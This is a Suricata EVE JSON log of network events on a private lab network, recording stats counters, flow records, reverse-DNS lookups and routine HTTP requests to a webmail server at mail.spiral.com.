{"timestamp":"2020-02-29T00:20:48.000201+0000","event_type":"stats","stats":{"uptime":14900,"capture":{"kernel_packets":137420,"kernel_drops":0},"decoder":{"pkts":137421,"bytes":94218240,"invalid":193,"ipv4":135872,"ipv6":10,"ethernet":137421,"raw":0,"null":0,"sll":0,"tcp":130370,"udp":5294,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2839,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2855,"synack":2846,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1874,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2423,"failed_udp":113},"tx":{"http":4802,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2505}},"flow_mgr":{"closed_pruned":2811,"new_pruned":17,"est_pruned":2476,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":105095,"memcap":0}}} {"timestamp":"2020-02-29T00:20:48.252101+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":0}} {"timestamp":"2020-02-29T00:20:48.266257+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54605,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:48.377643+0000","flow_id":934914226655249,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58554,"proto":"UDP","dns":{"type":"answer","id":54605,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:48.443639+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:20:48.443663+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968}} {"timestamp":"2020-02-29T00:20:51.001279+0000","flow_id":1337670470361580,"event_type":"flow","src_ip":"192.168.10.122","src_port":47730,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:50.221676+0000","end":"2020-02-29T00:15:50.330124+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000335+0000","flow_id":737255532685455,"event_type":"flow","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":23,"bytes_toserver":4481,"bytes_toclient":19168,"start":"2020-02-29T00:19:46.616591+0000","end":"2020-02-29T00:19:52.947214+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.000827+0000","flow_id":1877711068348992,"event_type":"flow","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:52.475712+0000","end":"2020-02-29T00:15:52.580812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:53.000963+0000","flow_id":1479997112177472,"event_type":"flow","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1895,"bytes_toclient":4685,"start":"2020-02-29T00:19:47.906048+0000","end":"2020-02-29T00:19:52.945156+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.001091+0000","flow_id":217650389304327,"event_type":"flow","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":2315,"bytes_toclient":3905,"start":"2020-02-29T00:19:47.902151+0000","end":"2020-02-29T00:19:52.945077+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.002294+0000","flow_id":1813814855284147,"event_type":"flow","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":13,"bytes_toserver":3894,"bytes_toclient":7440,"start":"2020-02-29T00:19:47.865715+0000","end":"2020-02-29T00:19:52.945234+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:53.445189+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34898,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":968},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2505,"tx_id":1}} {"timestamp":"2020-02-29T00:20:54.000194+0000","flow_id":1702579497324555,"event_type":"flow","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":17,"bytes_toserver":3120,"bytes_toclient":17124,"start":"2020-02-29T00:19:47.905227+0000","end":"2020-02-29T00:19:53.135539+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:54.001106+0000","flow_id":1347789426886640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34884,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":2079,"bytes_toclient":5519,"start":"2020-02-29T00:19:17.296944+0000","end":"2020-02-29T00:19:53.109237+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:55.000254+0000","event_type":"stats","stats":{"uptime":14907,"capture":{"kernel_packets":137460,"kernel_drops":0},"decoder":{"pkts":137460,"bytes":94232530,"invalid":193,"ipv4":135909,"ipv6":10,"ethernet":137460,"raw":0,"null":0,"sll":0,"tcp":130403,"udp":5298,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2840,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2856,"synack":2847,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1875,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2425,"failed_udp":113},"tx":{"http":4804,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2507}},"flow_mgr":{"closed_pruned":2815,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":5,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":19094,"memcap":0}}} {"timestamp":"2020-02-29T00:20:55.135421+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37860,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:55.246785+0000","flow_id":1792692210569469,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45056,"proto":"UDP","dns":{"type":"answer","id":37860,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420}} {"timestamp":"2020-02-29T00:20:55.315911+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:20:56.000605+0000","flow_id":787291901945212,"event_type":"flow","src_ip":"192.168.10.130","src_port":34888,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:19:50.484732+0000","end":"2020-02-29T00:19:55.771502+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:56.000896+0000","flow_id":969742112447211,"event_type":"flow","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":36752,"start":"2020-02-29T00:19:46.449259+0000","end":"2020-02-29T00:19:55.763745+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:00.316893+0000","flow_id":2248431190397810,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":420},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":784,"tx_id":0}} {"timestamp":"2020-02-29T00:21:02.000253+0000","event_type":"stats","stats":{"uptime":14914,"capture":{"kernel_packets":137463,"kernel_drops":0},"decoder":{"pkts":137469,"bytes":94234978,"invalid":193,"ipv4":135918,"ipv6":10,"ethernet":137469,"raw":0,"null":0,"sll":0,"tcp":130410,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2819,"new_pruned":17,"est_pruned":2478,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20832,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} {"timestamp":"2020-02-29T00:21:03.000612+0000","flow_id":784388504545285,"event_type":"flow","src_ip":"192.168.10.130","src_port":34892,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":698,"start":"2020-02-29T00:19:57.387077+0000","end":"2020-02-29T00:20:02.578497+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:04.000653+0000","flow_id":1369582092931394,"event_type":"flow","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":43,"pkts_toclient":40,"bytes_toserver":8611,"bytes_toclient":34906,"start":"2020-02-29T00:19:47.905538+0000","end":"2020-02-29T00:20:03.977950+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:05.000382+0000","flow_id":1602206096945749,"event_type":"flow","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:03.979541+0000","end":"2020-02-29T00:16:04.086107+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:09.000186+0000","event_type":"stats","stats":{"uptime":14921,"capture":{"kernel_packets":137469,"kernel_drops":0},"decoder":{"pkts":137472,"bytes":94235176,"invalid":193,"ipv4":135921,"ipv6":10,"ethernet":137472,"raw":0,"null":0,"sll":0,"tcp":130413,"udp":5300,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2841,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2857,"synack":2848,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1876,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2426,"failed_udp":113},"tx":{"http":4805,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2508}},"flow_mgr":{"closed_pruned":2821,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20502,"memcap_state":0,"memcap_global":0},"http":{"memuse":18854,"memcap":0}}} {"timestamp":"2020-02-29T00:21:11.000855+0000","flow_id":2077710532005367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52922,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6224,"start":"2020-02-29T00:20:04.445943+0000","end":"2020-02-29T00:20:10.267899+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:12.088636+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:12.197781+0000","flow_id":1751078273571388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33195,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:12.344766+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:21:14.000206+0000","flow_id":144498492304586,"event_type":"flow","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:13.650442+0000","end":"2020-02-29T00:16:13.758493+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:16.000229+0000","event_type":"stats","stats":{"uptime":14928,"capture":{"kernel_packets":137475,"kernel_drops":0},"decoder":{"pkts":137492,"bytes":94245717,"invalid":193,"ipv4":135941,"ipv6":10,"ethernet":137492,"raw":0,"null":0,"sll":0,"tcp":130429,"udp":5304,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2842,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2858,"synack":2849,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1877,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2427,"failed_udp":114},"tx":{"http":4806,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2509}},"flow_mgr":{"closed_pruned":2822,"new_pruned":17,"est_pruned":2479,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":104401,"memcap":0}}} {"timestamp":"2020-02-29T00:21:17.200064+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48902,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.208063+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64597,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:17.319419+0000","flow_id":1098183115353279,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57780,"proto":"UDP","dns":{"type":"answer","id":64597,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:17.386661+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360}} 